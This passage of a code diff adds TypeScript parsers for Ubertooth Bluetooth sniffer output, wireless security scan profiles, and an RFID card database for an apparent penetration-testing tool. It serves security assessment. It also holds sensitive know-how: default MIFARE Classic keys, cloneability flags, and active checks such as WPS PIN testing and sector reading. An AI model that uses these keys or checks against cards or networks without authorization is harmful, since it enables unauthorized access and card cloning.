+      advertisements,
+      connections,
+    }
+  }
+
+  /**
+   * Parse ubertooth-btle JSON output (with -q option).
+   */
+  export function parseBtleJson(json: string): {
+    devices: WirelessScanTypes.BluetoothDevice[]
+    advertisements: BLEAdvertisement[]
+  } {
+    const devices = new Map<string, WirelessScanTypes.BluetoothDevice>()
+    const advertisements: BLEAdvertisement[] = []
+
+    let data: unknown[]
+    try {
+      // Could be JSONL format
+      if (json.trim().startsWith("[")) {
+        data = JSON.parse(json)
+      } else {
+        data = json
+          .trim()
+          .split("\n")
+          .map((l) => JSON.parse(l))
+      }
+    } catch {
+      return { devices: [], advertisements: [] }
+    }
+
+    for (const item of data) {
+      const pkt = item as Record<string, unknown>
+      const addr = String(pkt.addr || pkt.address || "")
+
+      if (addr && addr.length === 17) {
+        const timestamp = Number(pkt.timestamp || pkt.systime || Date.now())
+        const rssi = pkt.rssi ? Number(pkt.rssi) : undefined
+
+        advertisements.push({
+          timestamp,
+          channel: Number(pkt.channel || pkt.ch || 37),
+          accessAddress: String(pkt.aa || pkt.access_address || ""),
+          advertisingAddress: addr,
+          advertisingType: String(pkt.type || pkt.pdu_type || "ADV_IND"),
+          data: String(pkt.data || pkt.payload || ""),
+          rssi,
+          pduType: pkt.pdu_type ? Number(pkt.pdu_type) : undefined,
+        })
+
+        const upperAddr = addr.toUpperCase()
+        if (!devices.has(upperAddr)) {
+          devices.set(upperAddr, {
+            id: WirelessScanStorage.createDeviceId(),
+            address: upperAddr,
+            name: pkt.name as string | undefined,
+            type: "ble",
+            rssi,
+            manufacturer: pkt.manufacturer as string | undefined,
+            services: [],
+            serviceUuids: [],
+            uuids: [],
+            paired: false,
+            connected: false,
+            trusted: false,
+            blocked: false,
+            firstSeen: timestamp,
+            lastSeen: timestamp,
+          })
+        } else {
+          const dev = devices.get(upperAddr)!
+          dev.lastSeen = timestamp
+          if (rssi && (!dev.rssi || rssi > dev.rssi)) {
+            dev.rssi = rssi
+          }
+          if (pkt.name && !dev.name) {
+            dev.name = String(pkt.name)
+          }
+        }
+      }
+    }
+
+    return {
+      devices: Array.from(devices.values()),
+      advertisements,
+    }
+  }
+
+  // ========== Classic Bluetooth Parsing ==========
+
+  /**
+   * Parse ubertooth-btbb output.
+   *
+   * Format:
+   * systime=1705766400 ch=39 LAP=ABC123 clk=0x12345678
+   */
+  export function parseBtbbOutput(output: string): {
+    piconets: Piconet[]
+    packets: BTBBPacket[]
+  } {
+    const piconets = new Map<string, Piconet>()
+    const packets: BTBBPacket[] = []
+
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+      if (!trimmed) continue
+
+      const packet = parseBtbbPacket(trimmed)
+      if (packet) {
+        packets.push(packet)
+
+        // Update piconet info
+        const lap = packet.lap.toUpperCase()
+        const existing = piconets.get(lap)
+        if (existing) {
+          existing.packets++
+          existing.lastSeen = packet.timestamp
+          if (packet.uap && !existing.uap) existing.uap = packet.uap
+          if (packet.nap && !existing.nap) existing.nap = packet.nap
+        } else {
+          piconets.set(lap, {
+            lap,
+            uap: packet.uap,
+            nap: packet.nap,
+            packets: 1,
+            firstSeen: packet.timestamp,
+            lastSeen: packet.timestamp,
+          })
+        }
+      }
+    }
+
+    // Try to construct BD_ADDR from discovered UAP+NAP
+    for (const piconet of piconets.values()) {
+      if (piconet.uap && piconet.nap) {
+        // BD_ADDR format: NAP:UAP:LAP
+        piconet.bdaddr = `${piconet.nap}:${piconet.uap}:${piconet.lap}`.toUpperCase()
+      }
+    }
+
+    return {
+      piconets: Array.from(piconets.values()),
+      packets,
+    }
+  }
+
+  /**
+   * Convert piconets to Bluetooth devices (where BD_ADDR is known).
+   */
+  export function piconetsToDevices(piconets: Piconet[]): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+
+    for (const piconet of piconets) {
+      if (piconet.bdaddr) {
+        // Convert BD_ADDR from NAP:UAP:LAP to standard MAC format
+        const bdaddr = piconet.bdaddr.replace(/:/g, "")
+        const mac =
+          bdaddr.length === 12
+            ? `${bdaddr.slice(0, 2)}:${bdaddr.slice(2, 4)}:${bdaddr.slice(4, 6)}:${bdaddr.slice(6, 8)}:${bdaddr.slice(8, 10)}:${bdaddr.slice(10, 12)}`
+            : piconet.bdaddr
+
+        devices.push({
+          id: WirelessScanStorage.createDeviceId(),
+          address: mac.toUpperCase(),
+          type: "classic",
+          services: [],
+          serviceUuids: [],
+          uuids: [],
+          paired: false,
+          connected: false,
+          trusted: false,
+          blocked: false,
+          firstSeen: piconet.firstSeen,
+          lastSeen: piconet.lastSeen,
+        })
+      }
+    }
+
+    return devices
+  }
+
+  // ========== ubertooth-scan Parsing ==========
+
+  /**
+   * Parse ubertooth-scan output.
+   *
+   * Format:
+   * BD_ADDR: AA:BB:CC:DD:EE:FF  Name: DeviceName  Class: 0x5A020C
+   */
+  export function parseScanOutput(output: string): WirelessScanTypes.BluetoothDevice[] {
+    const devices: WirelessScanTypes.BluetoothDevice[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      const trimmed = line.trim()
+      if (!trimmed) continue
+
+      // Try to parse BD_ADDR
+      const addrMatch = trimmed.match(/BD_ADDR:\s*([0-9A-Fa-f:]{17})/i)
+      if (!addrMatch) continue
+
+      const address = addrMatch[1].toUpperCase()
+
+      // Parse name
+      const nameMatch = trimmed.match(/Name:\s*([^\s]+(?:\s+[^\s]+)*?)(?:\s+Class:|$)/i)
+      const name = nameMatch?.[1]?.trim()
+
+      // Parse class
+      const classMatch = trimmed.match(/Class:\s*(0x[0-9A-Fa-f]+)/i)
+      const deviceClass = classMatch?.[1]
+
+      devices.push({
+        id: WirelessScanStorage.createDeviceId(),
+        address,
+        name,
+        type: "classic",
+        deviceClass: deviceClass ? parseDeviceClass(deviceClass) : undefined,
+        services: [],
+        serviceUuids: [],
+        uuids: [],
+        paired: false,
+        connected: false,
+        trusted: false,
+        blocked: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return devices
+  }
+
+  // ========== Helper Functions ==========
+
+  function parseAdvertisement(line: string): BLEAdvertisement | null {
+    // Pattern: systime=X ch=Y aa=Z addr=MAC TYPE
+    const pattern =
+      /systime=(\d+)\s+ch=(\d+)\s+(?:aa|access_address)=([0-9a-f]+)\s+addr=([0-9a-f:]{17})\s+(\w+)/i
+    const match = line.match(pattern)
+
+    if (match) {
+      return {
+        timestamp: parseInt(match[1], 10) * 1000,
+        channel: parseInt(match[2], 10),
+        accessAddress: match[3],
+        advertisingAddress: match[4],
+        advertisingType: match[5],
+        data: "",
+      }
+    }
+
+    // Alternative pattern: just address and type
+    const simplePattern = /addr(?:ess)?[=:\s]+([0-9a-f:]{17})/i
+    const simpleMatch = line.match(simplePattern)
+
+    if (simpleMatch) {
+      return {
+        timestamp: Date.now(),
+        channel: 37,
+        accessAddress: "",
+        advertisingAddress: simpleMatch[1],
+        advertisingType: "ADV_IND",
+        data: "",
+      }
+    }
+
+    return null
+  }
+
+  function parseConnection(line: string): BLEConnection | null {
+    // Pattern for CONNECT_REQ
+    const pattern =
+      /CONNECT_REQ.*?init(?:iator)?=([0-9a-f:]{17}).*?adv(?:ertiser)?=([0-9a-f:]{17}).*?aa=([0-9a-f]+)/i
+    const match = line.match(pattern)
+
+    if (match) {
+      return {
+        timestamp: Date.now(),
+        initiatorAddress: match[1],
+        advertiserAddress: match[2],
+        accessAddress: match[3],
+        hopInterval: 0,
+        hopIncrement: 0,
+        channelMap: "",
+      }
+    }
+
+    return null
+  }
+
+  function parseBtbbPacket(line: string): BTBBPacket | null {
+    // Pattern: systime=X ch=Y LAP=Z [UAP=A] [NAP=B] clk=C
+    const lapMatch = line.match(/LAP[=:\s]+([0-9a-f]{6})/i)
+    if (!lapMatch) return null
+
+    const timestampMatch = line.match(/systime[=:\s]+(\d+)/i)
+    const channelMatch = line.match(/ch(?:annel)?[=:\s]+(\d+)/i)
+    const clockMatch = line.match(/clk(?:ock)?[=:\s]+(0x[0-9a-f]+|\d+)/i)
+    const uapMatch = line.match(/UAP[=:\s]+([0-9a-f]{2})/i)
+    const napMatch = line.match(/NAP[=:\s]+([0-9a-f]{4})/i)
+    const typeMatch = line.match(/type[=:\s]+(\w+)/i)
+
+    return {
+      timestamp: timestampMatch ? parseInt(timestampMatch[1], 10) * 1000 : Date.now(),
+      lap: lapMatch[1].toUpperCase(),
+      uap: uapMatch?.[1].toUpperCase(),
+      nap: napMatch?.[1].toUpperCase(),
+      clock: clockMatch ? parseInt(clockMatch[1], 16) || parseInt(clockMatch[1], 10) : 0,
+      channel: channelMatch ? parseInt(channelMatch[1], 10) : 0,
+      packetType: typeMatch?.[1] || "unknown",
+    }
+  }
+
+  function parseDeviceClass(classHex: string): WirelessScanTypes.BluetoothClass {
+    const classNum = parseInt(classHex, 16)
+
+    // Extract major and minor device class
+    const majorClass = (classNum >> 8) & 0x1f
+    const minorClass = (classNum >> 2) & 0x3f
+
+    const majorClasses: Record<number, string> = {
+      0: "Miscellaneous",
+      1: "Computer",
+      2: "Phone",
+      3: "LAN/Network",
+      4: "Audio/Video",
+      5: "Peripheral",
+      6: "Imaging",
+      7: "Wearable",
+      8: "Toy",
+      9: "Health",
+      31: "Uncategorized",
+    }
+
+    return {
+      major: majorClasses[majorClass] || "Unknown",
+      minor: `0x${minorClass.toString(16).padStart(2, "0")}`,
+      services: extractServices(classNum),
+    }
+  }
+
+  function extractServices(classNum: number): string[] {
+    const services: string[] = []
+    const serviceFlags = (classNum >> 13) & 0x7ff
+
+    if (serviceFlags & 0x001) services.push("Limited Discoverable")
+    if (serviceFlags & 0x008) services.push("Positioning")
+    if (serviceFlags & 0x010) services.push("Networking")
+    if (serviceFlags & 0x020) services.push("Rendering")
+    if (serviceFlags & 0x040) services.push("Capturing")
+    if (serviceFlags & 0x080) services.push("Object Transfer")
+    if (serviceFlags & 0x100) services.push("Audio")
+    if (serviceFlags & 0x200) services.push("Telephony")
+    if (serviceFlags & 0x400) services.push("Information")
+
+    return services
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/profiles.ts b/packages/opencode/src/pentest/wirelessscan/profiles.ts
new file mode 100644
index 00000000000..92d52a5269a
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/profiles.ts
@@ -0,0 +1,373 @@
+/**
+ * @fileoverview Wireless Scanner Profiles
+ *
+ * Predefined scan profiles for different wireless security testing scenarios.
+ *
+ * @module pentest/wirelessscan/profiles
+ */
+
+import { WirelessScanTypes } from "./types"
+
+/**
+ * Wireless scanner profiles namespace.
+ */
+export namespace WirelessScanProfiles {
+  /**
+   * Discovery profile - Quick passive scan for all wireless types.
+   */
+  export const DISCOVERY: WirelessScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Quick passive discovery of all wireless networks and devices",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: true,
+      monitorMode: false,
+      passive: true,
+      duration: 30,
+    },
+    wifiChecks: ["list_networks", "identify_encryption", "detect_hidden"],
+    bluetoothChecks: ["list_devices", "identify_type"],
+    rfidChecks: ["list_tags", "identify_type"],
+  }
+
+  /**
+   * Quick profile - Fast WiFi-focused scan.
+   */
+  export const QUICK: WirelessScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick Scan",
+    description: "Fast WiFi security scan with basic Bluetooth detection",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: false,
+      monitorMode: false,
+      passive: true,
+      duration: 60,
+    },
+    wifiChecks: [
+      "list_networks",
+      "identify_encryption",
+      "check_wep",
+      "check_wpa_tkip",
+      "check_open",
+      "detect_wps",
+    ],
+    bluetoothChecks: ["list_devices", "identify_type", "check_discoverable"],
+    rfidChecks: [],
+  }
+
+  /**
+   * Standard profile - Comprehensive wireless security scan.
+   */
+  export const STANDARD: WirelessScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard Scan",
+    description: "Comprehensive wireless security assessment",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: true,
+      monitorMode: true,
+      passive: true,
+      duration: 300,
+    },
+    wifiChecks: [
+      "list_networks",
+      "identify_encryption",
+      "check_wep",
+      "check_wpa_tkip",
+      "check_open",
+      "detect_wps",
+      "check_wps_locked",
+      "enumerate_clients",
+      "detect_hidden",
+      "check_pmkid",
+      "check_signal_strength",
+      "identify_vendors",
+    ],
+    bluetoothChecks: [
+      "list_devices",
+      "identify_type",
+      "check_discoverable",
+      "enumerate_services",
+      "check_legacy_pairing",
+    ],
+    rfidChecks: ["list_tags", "identify_type", "check_frequency", "detect_readers"],
+  }
+
+  /**
+   * Thorough profile - In-depth security analysis.
+   */
+  export const THOROUGH: WirelessScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough Scan",
+    description: "In-depth wireless security analysis with all checks enabled",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: true,
+      monitorMode: true,
+      passive: true,
+      duration: 600,
+      bands: ["2.4ghz", "5ghz"],
+    },
+    wifiChecks: [
+      "list_networks",
+      "identify_encryption",
+      "check_wep",
+      "check_wpa_tkip",
+      "check_open",
+      "detect_wps",
+      "check_wps_locked",
+      "check_wps_version",
+      "enumerate_clients",
+      "detect_hidden",
+      "check_pmkid",
+      "check_signal_strength",
+      "identify_vendors",
+      "detect_rogue_ap",
+      "monitor_deauth",
+      "check_krack",
+      "check_dragonblood",
+      "analyze_handshakes",
+      "check_channel_overlap",
+    ],
+    bluetoothChecks: [
+      "list_devices",
+      "identify_type",
+      "check_discoverable",
+      "enumerate_services",
+      "enumerate_characteristics",
+      "check_legacy_pairing",
+      "check_blueborne",
+      "check_knob",
+      "check_ble_encryption",
+      "check_just_works",
+    ],
+    rfidChecks: [
+      "list_tags",
+      "identify_type",
+      "check_frequency",
+      "detect_readers",
+      "check_default_keys",
+      "check_weak_crypto",
+      "check_cloneable",
+      "check_writable",
+    ],
+  }
+
+  /**
+   * Passive profile - Listening only, no active probing.
+   */
+  export const PASSIVE: WirelessScanTypes.ScanProfile = {
+    id: "passive",
+    name: "Passive Monitoring",
+    description: "Passive listening mode for extended monitoring",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: false,
+      monitorMode: true,
+      passive: true,
+      duration: 1800,
+    },
+    wifiChecks: [
+      "list_networks",
+      "identify_encryption",
+      "enumerate_clients",
+      "detect_hidden",
+      "monitor_deauth",
+      "detect_rogue_ap",
+      "capture_handshakes",
+    ],
+    bluetoothChecks: ["list_devices", "identify_type", "passive_ble_scan"],
+    rfidChecks: [],
+  }
+
+  /**
+   * Active profile - Active probing and enumeration (use with authorization).
+   */
+  export const ACTIVE: WirelessScanTypes.ScanProfile = {
+    id: "active",
+    name: "Active Scan",
+    description: "Active probing and enumeration (requires authorization)",
+    options: {
+      wifi: true,
+      bluetooth: true,
+      rfid: true,
+      monitorMode: true,
+      passive: false,
+      duration: 300,
+    },
+    wifiChecks: [
+      "list_networks",
+      "identify_encryption",
+      "active_probe",
+      "check_wep",
+      "check_wpa_tkip",
+      "check_open",
+      "detect_wps",
+      "test_wps_pin",
+      "enumerate_clients",
+      "detect_hidden",
+      "probe_hidden",
+      "check_pmkid",
+      "identify_vendors",
+    ],
+    bluetoothChecks: [
+      "list_devices",
+      "identify_type",
+      "check_discoverable",
+      "enumerate_services",
+      "enumerate_characteristics",
+      "read_characteristics",
+      "check_legacy_pairing",
+      "test_pairing",
+    ],
+    rfidChecks: [
+      "list_tags",
+      "identify_type",
+      "check_frequency",
+      "detect_readers",
+      "check_default_keys",
+      "read_sectors",
+      "check_cloneable",
+      "check_writable",
+    ],
+  }
+
+  /**
+   * All profiles.
+   */
+  export const ALL_PROFILES: WirelessScanTypes.ScanProfile[] = [
+    DISCOVERY,
+    QUICK,
+    STANDARD,
+    THOROUGH,
+    PASSIVE,
+    ACTIVE,
+  ]
+
+  /**
+   * Get profile by ID.
+   */
+  export function getProfile(id: WirelessScanTypes.ProfileId): WirelessScanTypes.ScanProfile {
+    const profile = ALL_PROFILES.find((p) => p.id === id)
+    if (!profile) {
+      throw new Error(`Unknown profile: ${id}`)
+    }
+    return profile
+  }
+
+  /**
+   * Get profile IDs.
+   */
+  export function getProfileIds(): WirelessScanTypes.ProfileId[] {
+    return ALL_PROFILES.map((p) => p.id)
+  }
+
+  /**
+   * List all profiles with summary information.
+   */
+  export function listProfiles(): {
+    name: string
+    description: string
+    wirelessTypes: string[]
+    scanDuration: number
+  }[] {
+    return ALL_PROFILES.map((p) => ({
+      name: p.name,
+      description: p.description,
+      wirelessTypes: [
+        ...(p.options.wifi ? ["wifi"] : []),
+        ...(p.options.bluetooth ? ["bluetooth"] : []),
+        ...(p.options.rfid ? ["rfid"] : []),
+      ],
+      scanDuration: p.options.duration || 60,
+    }))
+  }
+
+  /**
+   * Format profiles as table for display.
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+
+    lines.push("Wireless Scan Profiles")
+    lines.push("=".repeat(80))
+    lines.push("")
+    lines.push("| Profile    | WiFi | BT  | RFID | Monitor | Passive | Duration |")
+    lines.push("|------------|------|-----|------|---------|---------|----------|")
+
+    for (const profile of ALL_PROFILES) {
+      const wifi = profile.options.wifi ? "Yes" : "No"
+      const bt = profile.options.bluetooth ? "Yes" : "No"
+      const rfid = profile.options.rfid ? "Yes" : "No"
+      const monitor = profile.options.monitorMode ? "Yes" : "No"
+      const passive = profile.options.passive ? "Yes" : "No"
+      const duration = profile.options.duration ? `${profile.options.duration}s` : "N/A"
+
+      lines.push(
+        `| ${profile.id.padEnd(10)} | ${wifi.padEnd(4)} | ${bt.padEnd(3)} | ${rfid.padEnd(4)} | ${monitor.padEnd(7)} | ${passive.padEnd(7)} | ${duration.padEnd(8)} |`
+      )
+    }
+
+    lines.push("")
+    lines.push("Profile Descriptions:")
+    for (const profile of ALL_PROFILES) {
+      lines.push(`  ${profile.id}: ${profile.description}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Merge custom options with profile defaults.
+   */
+  export function mergeOptions(
+    profile: WirelessScanTypes.ScanProfile,
+    customOptions?: Partial<WirelessScanTypes.ScanOptions>
+  ): WirelessScanTypes.ScanOptions {
+    if (!customOptions) {
+      return { ...profile.options }
+    }
+
+    return {
+      ...profile.options,
+      ...customOptions,
+    }
+  }
+
+  /**
+   * Validate profile options for current environment.
+   */
+  export function validateOptions(options: WirelessScanTypes.ScanOptions): {
+    valid: boolean
+    warnings: string[]
+    errors: string[]
+  } {
+    const warnings: string[] = []
+    const errors: string[] = []
+
+    if (options.monitorMode && options.passive === false) {
+      warnings.push("Active scanning with monitor mode may be detected")
+    }
+
+    if (!options.passive) {
+      warnings.push("Active scanning should only be performed with authorization")
+    }
+
+    if (options.rfid && !options.passive) {
+      warnings.push("Active RFID operations may modify tag data")
+    }
+
+    return {
+      valid: errors.length === 0,
+      warnings,
+      errors,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/cards.ts b/packages/opencode/src/pentest/wirelessscan/rfid/cards.ts
new file mode 100644
index 00000000000..2e481a0ccbf
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/cards.ts
@@ -0,0 +1,497 @@
+/**
+ * @fileoverview RFID Card Type Identification
+ *
+ * Identification and analysis of different RFID/NFC card types.
+ *
+ * @module pentest/wirelessscan/rfid/cards
+ */
+
+import { WirelessScanTypes } from "../types"
+
+/**
+ * RFID cards namespace.
+ */
+export namespace RFIDCards {
+  // ========== Card Type Definitions ==========
+
+  /**
+   * Card type information.
+   */
+  export interface CardTypeInfo {
+    type: WirelessScanTypes.RFIDTagType
+    name: string
+    frequency: WirelessScanTypes.RFIDFrequency
+    protocol: WirelessScanTypes.RFIDProtocol
+    manufacturer: string
+    memory: string
+    sectors?: number
+    blocks?: number
+    encryption: string
+    commonUses: string[]
+    securityLevel: "none" | "low" | "medium" | "high"
+    cloneable: boolean
+    defaultKeys?: string[]
+  }
+
+  /**
+   * Card type database.
+   */
+  export const CARD_TYPES: Record<WirelessScanTypes.RFIDTagType, CardTypeInfo> = {
+    "mifare-classic-1k": {
+      type: "mifare-classic-1k",
+      name: "MIFARE Classic 1K",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "1KB (16 sectors × 4 blocks)",
+      sectors: 16,
+      blocks: 64,
+      encryption: "Crypto1 (broken)",
+      commonUses: [
+        "Access control",
+        "Public transport",
+        "Loyalty cards",
+        "Event tickets",
+      ],
+      securityLevel: "low",
+      cloneable: true,
+      defaultKeys: [
+        "FFFFFFFFFFFF",
+        "A0A1A2A3A4A5",
+        "D3F7D3F7D3F7",
+        "000000000000",
+        "B0B1B2B3B4B5",
+        "4D3A99C351DD",
+        "1A982C7E459A",
+        "AABBCCDDEEFF",
+      ],
+    },
+    "mifare-classic-4k": {
+      type: "mifare-classic-4k",
+      name: "MIFARE Classic 4K",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "4KB (40 sectors)",
+      sectors: 40,
+      blocks: 256,
+      encryption: "Crypto1 (broken)",
+      commonUses: ["Access control", "Public transport", "Membership cards"],
+      securityLevel: "low",
+      cloneable: true,
+      defaultKeys: [
+        "FFFFFFFFFFFF",
+        "A0A1A2A3A4A5",
+        "D3F7D3F7D3F7",
+        "000000000000",
+      ],
+    },
+    "mifare-ultralight": {
+      type: "mifare-ultralight",
+      name: "MIFARE Ultralight",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "64 bytes",
+      blocks: 16,
+      encryption: "None (optional password on EV1)",
+      commonUses: ["Single-use tickets", "Event access", "Disposable tags"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    "mifare-ultralight-c": {
+      type: "mifare-ultralight-c",
+      name: "MIFARE Ultralight C",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "192 bytes",
+      blocks: 48,
+      encryption: "3DES",
+      commonUses: ["Limited-use tickets", "Access tokens"],
+      securityLevel: "medium",
+      cloneable: false,
+    },
+    "mifare-desfire": {
+      type: "mifare-desfire",
+      name: "MIFARE DESFire",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "2KB - 8KB",
+      encryption: "DES/3DES/AES (EV1/EV2)",
+      commonUses: [
+        "Secure access control",
+        "Public transport",
+        "Payment cards",
+      ],
+      securityLevel: "high",
+      cloneable: false,
+    },
+    "mifare-plus": {
+      type: "mifare-plus",
+      name: "MIFARE Plus",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "2KB - 4KB",
+      encryption: "AES-128",
+      commonUses: ["Upgraded Classic deployments", "Secure access"],
+      securityLevel: "high",
+      cloneable: false,
+    },
+    ntag213: {
+      type: "ntag213",
+      name: "NTAG213",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "144 bytes",
+      blocks: 45,
+      encryption: "Password (32-bit)",
+      commonUses: ["NFC tags", "Smart posters", "Authentication"],
+      securityLevel: "low",
+      cloneable: true,
+    },
+    ntag215: {
+      type: "ntag215",
+      name: "NTAG215",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "504 bytes",
+      blocks: 135,
+      encryption: "Password (32-bit)",
+      commonUses: ["NFC tags", "Amiibo", "Game accessories"],
+      securityLevel: "low",
+      cloneable: true,
+    },
+    ntag216: {
+      type: "ntag216",
+      name: "NTAG216",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "NXP",
+      memory: "888 bytes",
+      blocks: 231,
+      encryption: "Password (32-bit)",
+      commonUses: ["NFC tags", "Data storage", "Large records"],
+      securityLevel: "low",
+      cloneable: true,
+    },
+    em4100: {
+      type: "em4100",
+      name: "EM4100/EM4102",
+      frequency: "125khz",
+      protocol: "em4x",
+      manufacturer: "EM Microelectronic",
+      memory: "64 bits (read-only)",
+      encryption: "None",
+      commonUses: ["Access control", "Animal tracking", "Basic ID"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    em4102: {
+      type: "em4102",
+      name: "EM4102",
+      frequency: "125khz",
+      protocol: "em4x",
+      manufacturer: "EM Microelectronic",
+      memory: "64 bits (read-only)",
+      encryption: "None",
+      commonUses: ["Access control", "Time attendance"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    t5577: {
+      type: "t5577",
+      name: "T5577",
+      frequency: "125khz",
+      protocol: "em4x",
+      manufacturer: "Atmel",
+      memory: "330 bits",
+      blocks: 8,
+      encryption: "Optional password",
+      commonUses: ["Cloning", "Emulation", "Testing"],
+      securityLevel: "low",
+      cloneable: true,
+    },
+    "hid-prox": {
+      type: "hid-prox",
+      name: "HID Prox",
+      frequency: "125khz",
+      protocol: "hid",
+      manufacturer: "HID Global",
+      memory: "Varies (26-bit common)",
+      encryption: "None",
+      commonUses: ["Building access", "Corporate security"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    "hid-iclass": {
+      type: "hid-iclass",
+      name: "HID iCLASS",
+      frequency: "13.56mhz",
+      protocol: "iso15693",
+      manufacturer: "HID Global",
+      memory: "2KB - 32KB",
+      encryption: "3DES (legacy) / AES (SE)",
+      commonUses: ["Secure access control", "Government", "Healthcare"],
+      securityLevel: "medium",
+      cloneable: false,
+    },
+    indala: {
+      type: "indala",
+      name: "Indala",
+      frequency: "125khz",
+      protocol: "indala",
+      manufacturer: "HID Global (formerly Motorola)",
+      memory: "26-bit or 40-bit",
+      encryption: "Proprietary encoding",
+      commonUses: ["Access control", "Legacy systems"],
+      securityLevel: "low",
+      cloneable: true,
+    },
+    awid: {
+      type: "awid",
+      name: "AWID",
+      frequency: "125khz",
+      protocol: "awid",
+      manufacturer: "AWID",
+      memory: "26-bit or 34-bit",
+      encryption: "None",
+      commonUses: ["Access control"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    felica: {
+      type: "felica",
+      name: "FeliCa",
+      frequency: "13.56mhz",
+      protocol: "felica",
+      manufacturer: "Sony",
+      memory: "1KB - 9KB",
+      encryption: "Proprietary + AES",
+      commonUses: ["Transit (Suica, PASMO)", "E-money", "Access"],
+      securityLevel: "high",
+      cloneable: false,
+    },
+    topaz: {
+      type: "topaz",
+      name: "Topaz",
+      frequency: "13.56mhz",
+      protocol: "iso14443a",
+      manufacturer: "Broadcom",
+      memory: "96 bytes - 512 bytes",
+      encryption: "None",
+      commonUses: ["NFC Forum Type 1 tags"],
+      securityLevel: "none",
+      cloneable: true,
+    },
+    unknown: {
+      type: "unknown",
+      name: "Unknown",
+      frequency: "unknown",
+      protocol: "unknown",
+      manufacturer: "Unknown",
+      memory: "Unknown",
+      encryption: "Unknown",
+      commonUses: [],
+      securityLevel: "none",
+      cloneable: false,
+    },
+  }
+
+  // ========== Card Identification ==========
+
+  /**
+   * Get card type information.
+   */
+  export function getCardInfo(
+    type: WirelessScanTypes.RFIDTagType
+  ): CardTypeInfo {
+    return CARD_TYPES[type] || CARD_TYPES.unknown
+  }
+
+  /**
+   * Identify card type from tag data.
+   */
+  export function identifyCard(tag: WirelessScanTypes.RFIDTag): CardTypeInfo {
+    return getCardInfo(tag.type)
+  }
+
+  /**
+   * Get default keys for a card type.
+   */
+  export function getDefaultKeys(
+    type: WirelessScanTypes.RFIDTagType
+  ): string[] {
+    return CARD_TYPES[type]?.defaultKeys || []
+  }
+
+  // ========== Card Analysis ==========
+
+  /**
+   * Card security assessment.
+   */
+  export interface CardSecurityAssessment {
+    securityLevel: CardTypeInfo["securityLevel"]
+    vulnerabilities: string[]
+    recommendations: string[]
+    cloneable: boolean
+    keyRecoveryPossible: boolean
+  }
+
+  /**
+   * Assess card security.
+   */
+  export function assessCardSecurity(
+    tag: WirelessScanTypes.RFIDTag
+  ): CardSecurityAssessment {
+    const info = getCardInfo(tag.type)
+    const vulnerabilities: string[] = []
+    const recommendations: string[] = []
+
+    // Check for known vulnerabilities
+    if (info.type.startsWith("mifare-classic")) {
+      vulnerabilities.push("Crypto1 encryption is broken - keys can be recovered")
+      vulnerabilities.push("Vulnerable to nested authentication attack")
+      vulnerabilities.push("Vulnerable to darkside attack")
+      recommendations.push("Migrate to MIFARE DESFire or MIFARE Plus")
+      recommendations.push("Implement additional authentication layers")
+    }
+
+    if (info.securityLevel === "none") {
+      vulnerabilities.push("No encryption - data can be read by anyone")
+      if (info.cloneable) {
+        vulnerabilities.push("Card can be easily cloned")
+      }
+      recommendations.push("Consider upgrading to encrypted card technology")
+    }
+
+    if (tag.defaultKeys) {
+      vulnerabilities.push("Card may use default/weak keys")
+      recommendations.push("Change default keys to unique values")
+    }
+
+    if (info.type.includes("ntag") && !tag.passwordProtected) {
+      vulnerabilities.push("Password protection not enabled")
+      recommendations.push("Enable password protection for sensitive data")
+    }
+
+    if (info.type === "hid-prox") {
+      vulnerabilities.push("No encryption, easily sniffed and cloned")
+      recommendations.push("Upgrade to HID iCLASS SE or SEOS")
+    }
+
+    return {
+      securityLevel: info.securityLevel,
+      vulnerabilities,
+      recommendations,
+      cloneable: info.cloneable,
+      keyRecoveryPossible:
+        info.type.startsWith("mifare-classic") ||
+        info.securityLevel === "none" ||
+        info.securityLevel === "low",
+    }
+  }
+
+  // ========== Card Statistics ==========
+
+  /**
+   * Get card type statistics from a list of tags.
+   */
+  export function getCardStats(tags: WirelessScanTypes.RFIDTag[]): {
+    total: number
+    byType: Record<string, number>
+    byFrequency: Record<string, number>
+    bySecurityLevel: Record<string, number>
+    cloneableCount: number
+  } {
+    const byType: Record<string, number> = {}
+    const byFrequency: Record<string, number> = {}
+    const bySecurityLevel: Record<string, number> = {}
